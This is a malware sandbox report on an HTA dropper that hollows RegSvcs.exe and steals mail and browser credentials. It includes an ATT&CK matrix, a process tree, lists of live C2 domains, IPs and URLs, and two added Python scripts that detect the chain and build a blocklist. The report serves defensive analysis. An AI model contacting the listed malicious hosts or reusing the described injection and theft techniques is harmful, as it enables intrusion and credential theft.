MITRE ATT&CK matrix (the 14-column grid was flattened by extraction and is rebuilt here as one list per tactic). Only techniques the report marks with a signature-count badge are listed; the digits in parentheses are those badges as extracted, and where several badges sat side by side in one cell they were run together (for example "138"). Reconnaissance and Exfiltration have no flagged technique.

Resource Development: Scripting (111)
Initial Access: Valid Accounts (2)
Execution: Native API (3)
Persistence: Scripting (111), LSASS Driver (2), DLL Side-Loading (1), Valid Accounts (2), Windows Service (1), Registry Run Keys / Startup Folder (2)
Privilege Escalation: Exploitation for Privilege Escalation (1), Abuse Elevation Control Mechanism (1), LSASS Driver (2), DLL Side-Loading (1), Valid Accounts (2), Access Token Manipulation (21), Windows Service (1), Process Injection (212), Registry Run Keys / Startup Folder (2)
Defense Evasion: Disable or Modify Tools (11), Deobfuscate/Decode Files or Information (1), Abuse Elevation Control Mechanism (1), Obfuscated Files or Information (4), Direct Volume Access (1), Software Packing (1), Timestomp (1), DLL Side-Loading (1), Masquerading (222), Valid Accounts (2), Virtualization/Sandbox Evasion (11), Access Token Manipulation (21), Process Injection (212)
Credential Access: OS Credential Dumping (1), Input Capture (21)
Discovery: System Time Discovery (2), Account Discovery (1), File and Directory Discovery (3), System Information Discovery (138), Security Software Discovery (231), Virtualization/Sandbox Evasion (11), Process Discovery (2), Application Window Discovery (1), System Owner/User Discovery (1), System Network Configuration Discovery (1)
Lateral Movement: Taint Shared Content (1)
Collection: Archive Collected Data (1), Data from Local System (1), Email Collection (11), Input Capture (21), Clipboard Data (3)
Command and Control: Ingress Tool Transfer (2), Encrypted Channel (11), Non-Application Layer Protocol (3), Application Layer Protocol (14)
Impact: System Shutdown/Reboot (1)
Behavior graph legend (icon key): Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet
Behavior Graph ID: 1566438 | Sample: Ziraat_Swift.hta | Startdate: 02/12/2024 | Architecture: WINDOWS | Score: 100

The graph was flattened by extraction; its nodes (numbers in parentheses) and edges are rebuilt below.

Process tree:
  start (2)
    alg.exe (9)
    mshta.exe (14)
      x.exe (20)
        differences.exe (27)
          RegSvcs.exe (35)
    elevation_service.exe (16)
    14 other processes (18)
      differences.exe (25)
        differences.exe (31)
          RegSvcs.exe (39)
        RegSvcs.exe (33)

Sample level (2):
  Network: reallyfreegeoip.org (signature: Tries to detect the country of the analysis system (by using the IP)); ww7.przvgke.biz; 24 other IPs or domains
  Signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 14 other signatures

alg.exe (9):
  Network: ww99.fwiwk.biz 72.52.179.174, ports 49740, 49902, 80, LIQUIDWEBUS, United States; lpuegx.biz 82.112.184.197, ports 49753, 49754, 49790, FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU, Russian Federation; 7 other IPs or domains
  Dropped: C:\Program Files\...\updater.exe (PE32+); C:\Program Files\...\private_browsing.exe (PE32+); C:\Program Files\...\plugin-container.exe (PE32+); 120 other malicious files
  Signatures: Creates files in the system32 config directory; Writes data at the end of the disk (often used by bootkits to hide malicious code); Drops executable to a common third party application directory

mshta.exe (14):
  Dropped: C:\Users\user\AppData\Local\Temp\x.exe (PE32)
  Started: x.exe (20)

elevation_service.exe (16):
  Dropped: C:\Windows\System32\snmptrap.exe (PE32+); C:\Windows\System32\msiexec.exe (PE32+); C:\Windows\System32\msdtc.exe (PE32+); 8 other malicious files
  Signatures: Infects executable files (exe, dll, sys, html); Found direct / indirect Syscall (likely to bypass EDR)

14 other processes (18):
  Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage); Contains functionality to behave differently if execute on a Russian/Kazak computer
  Started: differences.exe (25)

x.exe (20):
  Network: cvgrf.biz 54.244.188.177, ports 49730, 49731, 49732, AMAZON-02US, United States
  Dropped: C:\Windows\System32\alg.exe (PE32+); C:\Windows\System32\AppVClient.exe (PE32+); C:\Users\user\AppData\...\differences.exe (PE32); 4 other malicious files
  Signatures: Binary is likely a compiled AutoIt script file; Writes data at the end of the disk (often used by bootkits to hide malicious code); Drops executable to a common third party application directory; Infects executable files (exe, dll, sys, html)
  Started: differences.exe (27)

differences.exe (25):
  Started: differences.exe (31); RegSvcs.exe (33)

differences.exe (27):
  Dropped: C:\Users\user\AppData\...\differences.vbs (data)
  Signatures: Drops VBS files to the startup folder; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
  Started: RegSvcs.exe (35)

RegSvcs.exe (35):
  Network: checkip.dyndns.com 193.122.130.0, ports 49733, 49749, 80, ORACLE-BMC-31898US, United States; reallyfreegeoip.org 104.21.67.152, ports 443, 49736, 49752, CLOUDFLARENETUS, United States

RegSvcs.exe (39):
  Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
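The process tree above, mshta.exe launching x.exe from %TEMP%, x.exe dropping differences.exe, and differences.exe starting RegSvcs.exe, is the part of this report that translates most directly into endpoint detection logic. Note how the "Process created" rows earlier on this page record RegSvcs.exe with the command line "C:\Users\user\AppData\Local\subpredicate\differences.exe": the image on disk is a .NET framework utility but the command line still names the parent's dropped file, which is what a hollowed process looks like in process-creation telemetry. The script below is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling; it evaluates three rules over Sysmon-style process-creation records. The records are constructed here to mirror the report's tree (the pids, the mshta.exe location and the HTA's path on the desktop are assumptions), and the list of .NET host binaries beyond RegSvcs.exe is an assumption about commonly abused utilities, not something the report states.

```python
"""Flag the HTA -> dropper -> hollowed .NET utility chain from process-creation events.

Added example (not from the Joe Sandbox report). Records are constructed,
Sysmon-style: pid, ppid, image path, command line.
"""
import ntpath
from dataclasses import dataclass
from typing import Dict, List, Tuple

# .NET framework utilities commonly used as hollowing / injection targets (assumed list).
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe", "aspnet_compiler.exe"}
# Directory fragments a standard user can write to.
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def first_token_basename(cmdline: str) -> str:
    """Basename of the program a Windows command line names (quoted or bare first token)."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        token = s[1:end] if end > 0 else s[1:]
    else:
        token = s.split(None, 1)[0] if s else ""
    return ntpath.basename(token).lower()


def _strip_exe(name: str) -> str:
    return name[:-4] if name.endswith(".exe") else name


def in_user_writable(path: str) -> bool:
    p = path.lower()
    return any(frag in p for frag in USER_WRITABLE)


def detect(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule name, pid) for every event that trips a rule."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings: List[Tuple[str, int]] = []
    for e in events:
        child = ntpath.basename(e.image).lower()
        parent = by_pid.get(e.ppid)
        parent_name = ntpath.basename(parent.image).lower() if parent else ""
        # Rule 1: the created image is not the program the command line names
        # (a hollowed process keeps the command line of the dropper that spawned it).
        named = first_token_basename(e.cmdline)
        if named and _strip_exe(named) != _strip_exe(child):
            findings.append(("image_cmdline_mismatch", e.pid))
        # Rule 2: mshta.exe launching a binary from a user-writable location.
        if parent_name == "mshta.exe" and in_user_writable(e.image):
            findings.append(("mshta_spawns_user_writable_exe", e.pid))
        # Rule 3: a .NET host utility started by a parent living in a user-writable directory.
        if child in DOTNET_HOSTS and parent is not None and in_user_writable(parent.image):
            findings.append(("dotnet_host_from_user_writable_parent", e.pid))
    return findings


REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
DROPPER = r"C:\Users\user\AppData\Local\subpredicate\differences.exe"

# Constructed records mirroring the report's tree; pid 2000 is a benign control.
SAMPLE_EVENTS = [
    ProcEvent(1000, 900, r"C:\Windows\SysWOW64\mshta.exe",
              r'mshta.exe "C:\Users\user\Desktop\Ziraat_Swift.hta"'),
    ProcEvent(1100, 1000, r"C:\Users\user\AppData\Local\Temp\x.exe",
              r'"C:\Users\user\AppData\Local\Temp\x.exe"'),
    ProcEvent(1200, 1100, DROPPER, f'"{DROPPER}"'),
    ProcEvent(1300, 1200, REGSVCS, f'"{DROPPER}"'),
    ProcEvent(2000, 900, REGSVCS, f'"{REGSVCS}" /u MyComponent.dll'),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

Rule 1 is the cheapest of the three and the one most specific to this sample's technique; it also catches the first two RegSvcs.exe rows on this page as written. Rule 2 alone is noisy on hosts that legitimately run HTAs, so pairing it with the parent-child context of rule 3 is what makes the chain, rather than any single event, the alert.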

Submitted file

Source | Detection | Scanner | Label
Ziraat_Swift.hta | 5% | ReversingLabs | Win32.Trojan.Generic
Ziraat_Swift.hta | 8% | Virustotal |
Dropped files

Source | Detection | Scanner | Label
C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Joe Sandbox ML |
                  No Antivirus matches
Domains

Source | Detection | Scanner
ww99.przvgke.biz | 11% | Virustotal
ww99.fwiwk.biz | 14% | Virustotal
ww7.fwiwk.biz | 15% | Virustotal
ww7.przvgke.biz | 14% | Virustotal
URLs

Source | Detection | Scanner | Label
http://54.244.188.177:80/irtgqxbqsqyophmbi | 0% | Avira URL Cloud | safe
http://44.221.84.105/hwjtljgqnsqgbcs | 0% | Avira URL Cloud | safe
http://ww99.przvgke.biz/widfafwxfswriju | 100% | Avira URL Cloud | malware
http://ww7.przvgke.biz/widfafwxfswrij?usid=26&utid=9204703590 | 100% | Avira URL Cloud | malware
http://54.244.188.177/irtgqxbqsqyophmbL | 0% | Avira URL Cloud | safe
http://82.112.184.197:80/vtrrtopft | 0% | Avira URL Cloud | safe
http://54.244.188.177/lfu | 0% | Avira URL Cloud | safe
http://ww99.przvgke.biz/widfafwxfswrij | 100% | Avira URL Cloud | malware
http://18.141.10.107:80/r | 0% | Avira URL Cloud | safe
http://18.141.10.107/rq | 0% | Avira URL Cloud | safe
http://18.141.10.107/q | 0% | Avira URL Cloud | safe
http://54.244.188.177/irtgqxbqsqyophmb& | 0% | Avira URL Cloud | safe
http://54.244.188.177/lf | 0% | Avira URL Cloud | safe
http://82.112.184.197:80/dmksqnbs | 0% | Avira URL Cloud | safe
http://18.141.10.107/qs#q | 0% | Avira URL Cloud | safe
http://54.244.188.177/3? | 0% | Avira URL Cloud | safe
http://ww12.przvgke.biz/jenyp?usid=26&utid=9204704395 | 100% | Avira URL Cloud | malware
http://54.244.188.177/?q | 0% | Avira URL Cloud | safe
http://ww99.przvgke.biz/jenyp | 100% | Avira URL Cloud | malware
http://54.244.188.177/7q | 0% | Avira URL Cloud | safe
http://44.221.84.105/hwjtljgqnsqgbc | 0% | Avira URL Cloud | safe
http://54.244.188.177/irtgqxbqsqyophmb | 0% | Avira URL Cloud | safe
http://54.244.188.177/kqP | 0% | Avira URL Cloud | safe
http://82.112.184.197/ | 0% | Avira URL Cloud | safe
Contacted domains and IPs

Name | IP | Active | Malicious | Antivirus Detection (- = none listed) | Reputation
przvgke.biz | 172.234.222.138 | true | false | - | high
76899.bodis.com | 199.59.243.227 | true | false | - | high
ssbzmoy.biz | 18.141.10.107 | true | false | - | high
knjghuig.biz | 18.141.10.107 | true | false | - | high
vjaxhpbji.biz | 82.112.184.197 | true | false | - | high
pywolwnvd.biz | 54.244.188.177 | true | false | - | high
reallyfreegeoip.org | 104.21.67.152 | true | false | - | high
ifsaia.biz | 13.251.16.150 | true | false | - | high
checkip.dyndns.com | 193.122.130.0 | true | false | - | high
cvgrf.biz | 54.244.188.177 | true | false | - | high
ww99.przvgke.biz | 72.52.179.174 | true | false | - | unknown
lpuegx.biz | 82.112.184.197 | true | false | - | high
ww99.fwiwk.biz | 72.52.179.174 | true | false | - | unknown
saytjshyf.biz | 44.221.84.105 | true | false | - | high
084725.parkingcrew.net | 13.248.148.254 | true | false | - | high
xlfhhhm.biz | 47.129.31.212 | true | false | - | high
fwiwk.biz | 172.234.222.138 | true | false | - | high
vcddkls.biz | 18.141.10.107 | true | false | - | high
npukfztj.biz | 44.221.84.105 | true | false | - | high
ww7.przvgke.biz | unknown | unknown | true | - | unknown
ww7.fwiwk.biz | unknown | unknown | true | - | unknown
zlenh.biz | unknown | unknown | false | - | high
checkip.dyndns.org | unknown | unknown | false | - | high
uhxqin.biz | unknown | unknown | false | - | high
ww12.przvgke.biz | unknown | unknown | true | - | unknown
anpmnmxo.biz | unknown | unknown | false | - | high
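Joe Sandbox's Name/IP table, copied out as plain text, runs the Active and Malicious flags together (truefalse, unknowntrueunknown) and sometimes pushes the reputation onto the next line, which makes it awkward to feed straight into a blocklist. The Python below is an added example and not part of the Joe Sandbox report: it parses a constructed excerpt in exactly that flattened layout into records, derives a blocklist from the entries the sandbox marked Malicious, and runs two checks over constructed process-to-destination events. The second check looks for a single process querying more than one public IP/geo lookup service, which is the pattern behind the report's "Tries to detect the country of the analysis system (by using the IP)" signature on RegSvcs.exe. The event tuples, the GEO_CHECK_HOSTS set and the two-service threshold are assumptions made for the example, not data from the report.

```python
"""Added example (not from the Joe Sandbox report): parse the report's
flattened Name/IP table into IOC records and run two checks over
process-to-destination events."""
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# Constructed excerpt in the report's text layout: a name line, an IP line
# ("unknown" when the sandbox never resolved it), then the Active and
# Malicious flags run together ("truefalse"); the reputation is either
# appended to that line ("truefalseunknown") or sits on a line of its own.
REPORT_EXCERPT = """\
przvgke.biz
172.234.222.138
truefalse
high
ww99.przvgke.biz
72.52.179.174
truefalseunknown
ww7.przvgke.biz
unknown
unknowntrueunknown
ww12.przvgke.biz
unknown
unknowntrue
unknown
checkip.dyndns.com
193.122.130.0
truefalse
high
"""

FLAG = re.compile(r"true|false|unknown")


@dataclass
class HostRecord:
    name: str
    ip: str
    active: str
    malicious: str
    reputation: str


def parse_host_table(text: str) -> List[HostRecord]:
    """Split the fused flag tokens and re-attach a reputation that spilled
    onto the following line; refuse anything that is not three flag-like
    tokens so a misaligned table fails loudly instead of shifting columns."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    records: List[HostRecord] = []
    i = 0
    while i + 2 < len(lines):
        name, ip, flag_line = lines[i], lines[i + 1], lines[i + 2]
        flags = FLAG.findall(flag_line)
        if len(flags) not in (2, 3) or "".join(flags) != flag_line:
            raise ValueError(f"bad flag line for {name}: {flag_line!r}")
        i += 3
        if len(flags) == 2:  # reputation is on the next line
            if i >= len(lines):
                raise ValueError(f"missing reputation for {name}")
            flags.append(lines[i])
            i += 1
        records.append(HostRecord(name, ip, flags[0], flags[1], flags[2]))
    return records


def blocklist(records: List[HostRecord]) -> Tuple[Set[str], Set[str]]:
    """Names and resolved IPs of entries the sandbox marked Malicious == true."""
    bad = [r for r in records if r.malicious == "true"]
    return {r.name for r in bad}, {r.ip for r in bad if r.ip != "unknown"}


# Constructed events (timestamp, process image, destination host). The
# RegSvcs.exe pair mirrors the report's behaviour graph; the rest is filler.
SAMPLE_EVENTS = [
    ("2024-12-02T10:00:01", "RegSvcs.exe", "checkip.dyndns.com"),
    ("2024-12-02T10:00:02", "RegSvcs.exe", "reallyfreegeoip.org"),
    ("2024-12-02T10:00:05", "alg.exe", "ww7.przvgke.biz"),
    ("2024-12-02T10:00:06", "alg.exe", "lpuegx.biz"),
    ("2024-12-02T10:00:09", "chrome.exe", "www.google.com"),
]

# Assumption: the public IP/geo lookup hosts behind the report's
# "detect the country of the analysis system" signature.
GEO_CHECK_HOSTS = {"checkip.dyndns.com", "checkip.dyndns.org", "reallyfreegeoip.org"}


def match_events(events, names: Set[str], ips: Set[str]):
    """Events whose destination is on the blocklist (by name or by IP)."""
    return [e for e in events if e[2] in names or e[2] in ips]


def geo_check_processes(events, min_services: int = 2) -> List[str]:
    """Processes that touch at least min_services distinct geo/IP lookup
    hosts. One lookup is common for legitimate software; two in a row from
    a .NET host process such as RegSvcs.exe is the pattern in the report."""
    seen: Dict[str, Set[str]] = {}
    for _, proc, dst in events:
        if dst in GEO_CHECK_HOSTS:
            seen.setdefault(proc, set()).add(dst)
    return sorted(p for p, hosts in seen.items() if len(hosts) >= min_services)


if __name__ == "__main__":
    recs = parse_host_table(REPORT_EXCERPT)
    names, ips = blocklist(recs)
    for ev in match_events(SAMPLE_EVENTS, names, ips):
        print("blocklisted destination:", ev)
    print("geo-check processes:", geo_check_processes(SAMPLE_EVENTS))
```

In practice the events would come from Sysmon DNS or network-connection records or a proxy log rather than the inline list, and the blocklist would also pull in the URL hosts that Avira URL Cloud flags as malware, since the sandbox's Malicious column alone leaves ww99.przvgke.biz and ww99.fwiwk.biz at false despite their Virustotal hits.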
Contacted URLs

Name | Malicious | Antivirus Detection (- = none listed) | Reputation
http://lpuegx.biz/dmksqnbs | false | - | high
http://xlfhhhm.biz/fnbbnvvirqhlfx | false | - | high
http://ssbzmoy.biz/r | false | - | high
http://checkip.dyndns.org/ | false | - | high
http://vjaxhpbji.biz/lhocoojsqrafriia | false | - | high
http://vcddkls.biz/kf | false | - | high
http://pywolwnvd.biz/aah | false | - | high
http://npukfztj.biz/hwjtljgqnsqgbc | false | - | high
https://reallyfreegeoip.org/xml/8.46.123.228 | false | - | high
http://przvgke.biz/jenyp | false | - | high
http://fwiwk.biz/a | false | - | high
http://pywolwnvd.biz/lf | false | - | high
http://przvgke.biz/widfafwxfswrij | false | - | high
http://pywolwnvd.biz/hx | false | - | high
http://vjaxhpbji.biz/vip | false | - | high
http://lpuegx.biz/vtrrtopft | false | - | high
http://saytjshyf.biz/bkq | false | - | high
http://knjghuig.biz/rq | false | - | high
http://cvgrf.biz/hluumowlkjhsxe | false | - | high
http://pywolwnvd.biz/nwqf | false | - | high
http://ifsaia.biz/laps | false | - | high
URLs found in memory and binary data

Name | Source (process, memory dump) | Malicious | Antivirus Detection (- = none listed) | Reputation
http://ww7.przvgke.biz/widfafwxfswrij?usid=26&utid=9204703590 | alg.exe, 00000003.00000003.1893965929.000000000069B000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://82.112.184.197:80/vtrrtopft | alg.exe, 00000003.00000003.2189424613.0000000000667000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881 | alg.exe, 00000003.00000003.2321824408.0000000001590000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://18.141.10.107/rq | alg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://54.244.188.177:80/irtgqxbqsqyophmbi | x.exe, 00000001.00000002.1738442951.0000000000C21000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ww99.przvgke.biz/widfafwxfswriju | alg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmp; alg.exe, 00000003.00000003.2423644007.000000000064F000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://54.244.188.177/irtgqxbqsqyophmbL | x.exe, 00000001.00000002.1738442951.0000000000C11000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://54.244.188.177/lfu | alg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://18.141.10.107:80/r | alg.exe, 00000003.00000003.1794290607.0000000000667000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://18.141.10.107/ | alg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com | alg.exe, 00000003.00000003.1893965929.000000000069B000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.dropbox.com/oauth2/authorize | alg.exe, 00000003.00000003.1840894790.0000000001450000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://44.221.84.105/hwjtljgqnsqgbcs | alg.exe, 00000003.00000003.1840248607.000000000064F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ww99.przvgke.biz/widfafwxfswrij | alg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmp; alg.exe, 00000003.00000003.2410675571.0000000000695000.00000004.00000020.00020000.00000000.sdmp; alg.exe, 00000003.00000003.1966234277.0000000000690000.00000004.00000020.00020000.00000000.sdmp; alg.exe, 00000003.00000003.2423644007.000000000064F000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://www.dropbox.com/oauth2/authorizeInvalidBrowserSettingsBrowserCreationFailedInvalidRenderHand | alg.exe, 00000003.00000003.1840894790.0000000001450000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://54.244.188.177/3? | x.exe, 00000001.00000002.1738442951.0000000000C03000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://54.244.188.177/ | x.exe, 00000001.00000002.1738442951.0000000000C03000.00000004.00000020.00020000.00000000.sdmp; x.exe, 00000001.00000002.1738442951.0000000000C21000.00000004.00000020.00020000.00000000.sdmp; alg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://54.244.188.177/lf | alg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmp; alg.exe, 00000003.00000003.1770456267.000000000066F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://44.221.84.105/ | alg.exe, 00000003.00000003.1840248607.000000000064F000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://82.112.184.197:80/dmksqnbs | alg.exe, 00000003.00000003.2412274626.0000000000667000.00000004.00000020.00020000.00000000.sdmp; alg.exe, 00000003.00000003.2423644007.0000000000667000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://18.141.10.107/qs#q | alg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1 | alg.exe, 00000003.00000003.2321824408.0000000001590000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://54.244.188.177/irtgqxbqsqyophmb& | x.exe, 00000001.00000002.1738685341.0000000000C42000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://18.141.10.107/q | alg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://54.244.188.177/?q | alg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
